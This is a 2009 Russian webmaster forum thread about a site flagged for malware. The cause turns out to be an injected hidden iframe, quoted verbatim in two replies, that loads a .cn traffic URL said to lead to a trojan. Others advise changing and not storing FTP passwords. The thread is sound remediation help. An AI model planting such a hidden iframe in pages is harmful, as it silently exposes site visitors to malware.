Этот сайт может нанести вред вашему компьютеру...

S0
На сайте с 24.06.2007
Offline
84
709

Возникла следующая проблема, гугл (stopbadware.org) считает, что на сайте распространяется вредоносное ПО. При заходе на сайт выскакивает сообщение - нужно установить надстройку для ИЕ, но раньше такого не было, нод32 и аутпост молчат.

Смотрел файлы движка и шаблона, проверял их встроенным антивирусом - ничего нет. Из скриптов/ифреймов стоит следующее: чат cbox.ws, маркетгид, редтрам, счетчики - все это уже стоит очень давно. Недавно поставил кинотрафф, и попаптраф (кликандер) - но ничего отрицательного про них не видел, никаких обвинений в распространении вредоносного ПО. Та и пробовал их убирать, а также вообще все скрипты, даже счетчики - сообщение об установке надстроек все равно остается.

Сайт - ka4ni.ru. Прошу всех, кто сталкивался с подобной ситуацией - отозваться и помочь советом

stepan007 добавил 12.01.2009 в 00:10

Посоветовали скопировать все файлы с винта на сервер - вроде проблема изчезла, сообщение о надстройках больше не выводится. :) Тему можно закрыть

D4
На сайте с 29.12.2008
Offline
1
#1

у меня чего то всё равно предупреждение выходит..

S0
На сайте с 24.06.2007
Offline
84
#2
dimy4:
у меня чего то всё равно предупреждение выходит..

Да, есть такое... не долго я радовался :(

Опять всех кто чем-то может помочь, прошу высказываться

stepan007 добавил 12.01.2009 в 01:53

Вроде опять убрал ))

Надеюсь, снова эта фигня не появится.

RO
На сайте с 04.01.2009
Offline
0
RBO
#3
stepan007:
Возникла следующая проблема, гугл (stopbadware.org) считает, что на сайте распространяется вредоносное ПО

Весёлые китайцы -


<iframe src="http://breakss78jh.cn/trafik.php?id=120642&a=40" width="0" height="0" style="display:none"></iframe>

Если копнуть глубже вылезет трой.

S0
На сайте с 24.06.2007
Offline
84
#4
RBO:
Весёлые китайцы -

<iframe src="http://breakss78jh.cn/trafik.php?id=120642&a=40" width="0" height="0" style="display:none"></iframe>

Если копнуть глубже вылезет трой.

Спасибо за ответ :) Да, это оно. Этот ифрейм был после одного сайта из топа, притом сканирование всех файлов grep на этот сайт ничего не дало. После нескольких минут эта фигня опять появилась и grep ее нашел только в partners.tmp, в файлах движка он ничего не видит, только в темп-файле. Вобщем убил сайт и заново добавил - вроде теперь ничего подобного нет. Но надо подождать до завтра, т.к. седня тоже вроде все очистил - оно опять появилось...

Skom
На сайте с 02.12.2006
Offline
165
#5

Уже старо как мир.

Менять пароль на ftp.

Не прописывать пароль в ftp клиенте.

Cras amet qui numquam amavit quique amavit cras amet
basilic
На сайте с 16.05.2008
Offline
369
#6
Skom:
Уже старо как мир.
Менять пароль на ftp.
Не прописывать пароль в ftp клиенте.

Хех - и хостеру пингануть и уведомить не помешало бы.

[Удален]
#7
Skom:
Уже старо как мир.
Менять пароль на ftp.
Не прописывать пароль в ftp клиенте.

+1 именно, старо

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий